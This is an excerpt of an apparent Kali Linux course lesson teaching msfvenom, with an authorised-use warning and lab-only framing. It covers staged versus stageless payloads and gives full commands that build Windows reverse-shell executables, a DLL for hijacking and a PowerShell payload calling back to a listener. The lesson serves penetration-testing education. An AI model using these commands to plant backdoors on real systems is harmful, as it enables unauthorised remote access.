π° Originally published on Securityelites β AI Red Team Education β the canonical, fully-updated version of this article.
DAY 27
KALI LINUX COURSE
FREE
Day 27 of 180 Β· Kali Linux Mastery
β οΈ Authorised Use Only. Msfvenom generates real offensive payloads. Use exclusively on systems you own or have written permission to test. All exercises target your own Metasploitable/DVWA labs only.
Msfvenom is the payload factory of every serious penetration tester. One command generates a Windows backdoor, a Linux reverse shell, or an Android APK β custom, encoded, and ready to execute. Iβm walking you through the complete msfvenom tutorial today: payload types, encoding, listener setup, and a full end-to-end lab against your Metasploitable instance.
π What Youβll Master in Day 27
- What Msfvenom Is and How It Works
- Staged vs Stageless Payloads
- Windows Payload Generation
- Linux and Android Payloads
- Encoding: Shikata_Ga_Nai
- Multi/Handler Listener Setup
- Advanced: Embedding Into Templates
Yesterday on Day 26 I covered the Social-Engineer Toolkit for phishing and pretexting. Today we move into the payload itself β the executable code that opens the connection. Understanding the full Kali Linux course payload workflow makes everything from SET delivery to post-exploitation click into place.
What Msfvenom Is and How It Works
Msfvenom combines two older Metasploit tools β msfpayload (shellcode generation) and msfencode (obfuscation) β into one faster, simpler command. When I run msfvenom, I specify three things: what the payload does (connect back, open a shell, execute commands), what format to deliver it in (EXE, ELF, APK, raw bytes), and optionally how to encode it to reduce antivirus detection. Every payload has three mandatory parameters: the payload module (-p), the callback IP (LHOST), and the callback port (LPORT).
securityelites.com
Core msfvenom syntax
msfvenom -p LHOST= LPORT= -f -o
List all payloads
$ msfvenom -l payloads | grep windows/meterpreter
windows/meterpreter/reverse_tcp # staged
windows/meterpreter_reverse_tcp # stageless
windows/x64/meterpreter/reverse_tcp # 64-bit staged
windows/meterpreter/reverse_https # encrypted
List all output formats
$ msfvenom βlist formats
exe, elf, apk, dll, ps1, py, raw, war, aspx, jarβ¦
πΈ Msfvenom syntax and payload listing. The -l payloads command shows all available modules. I always grep for the platform Iβm targeting β grepping for βwindows/meterpreterβ filters to the most commonly used payload family.
π‘ Core Concept:The payload is WHAT happens. The format is HOW itβs delivered. The encoder is how it LOOKS to defences. Master these three independently and you can build any payload configuration you need.
Staged vs Stageless: The Slash vs Underscore Rule
The most important distinction in msfvenom that every beginner gets wrong: staged versus stageless payloads. My fast rule β the slash in the payload name tells you which type you have. windows/meterpreter/reverse_tcp has a slash between meterpreter and reverse_tcp β that is staged. windows/meterpreter_reverse_tcp has only underscores β that is stageless. This rule applies to every platform: Windows, Linux, Android.
securityelites.com
Staged vs Stageless β Decision Reference
STAGED (has slash /)
windows/meterpreter/reverse_tcp
β Small stager sent (~300 bytes)
β Fetches full payload at runtime
β Smaller file size on disk
β Needs stable network for stage 2
β
Use for: stable labs, small size
STAGELESS (underscores only)
windows/meterpreter_reverse_tcp
β Complete payload in one file
β No second stage download
β Larger file size on disk
β Better through strict firewalls
β
Use for: real engagements, firewalls
πΈ Staged vs stageless payload decision reference. In lab environments I default to staged β smaller files, faster iteration. In real engagements where Iβm uncertain about the network path between target and listener, I switch to stageless to avoid the second-stage download being blocked by a firewall or proxy.
π§ EXERCISE 1 β THINK LIKE A HACKER (2 MIN)
Identify Staged vs Stageless From Payload Names
Classify each as Staged (S) or Stageless (SL):
windows/x64/meterpreter/reverse_tcp
windows/meterpreter_reverse_https
linux/x86/meterpreter/reverse_tcp
android/meterpreter_reverse_tcp
windows/shell/reverse_tcp
Answers: 1=S 2=SL 3=S 4=SL 5=S
β
Learned: Slash = staged, underscore-only = stageless. Works for every platform in msfvenom.
πΈ Share your completed quiz in #kali-linux-course on Discord!
Windows Payload Generation
Windows is the most common target in penetration tests. Msfvenom generates EXE, DLL, PowerShell, and raw shellcode payloads for Windows targets. My workflow for every Windows payload: generate with the correct architecture (x86 for 32-bit, x64 for 64-bit), set LHOST to my Kali IP on the lab network, set a port that isnβt commonly blocked, and match the format to the delivery method.
WINDOWS PAYLOAD COMMANDS
Copy
# 32-bit Windows reverse TCP (most common)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe -o shell32.exe
# 64-bit Windows reverse TCP
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe -o shell64.exe
# HTTPS payload β encrypted callback
msfvenom -p windows/meterpreter/reverse_https \
LHOST=192.168.1.100 LPORT=443 -f exe -o shell_https.exe
# DLL payload for DLL hijacking
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f dll -o malicious.dll
# PowerShell payload β fileless approach
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f ps1 -o shell.ps1
π Read the complete guide on Securityelites β AI Red Team Education
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on Securityelites β AI Red Team Education β
This article was originally written and published by the Securityelites β AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites β AI Red Team Education.
Top comments (0)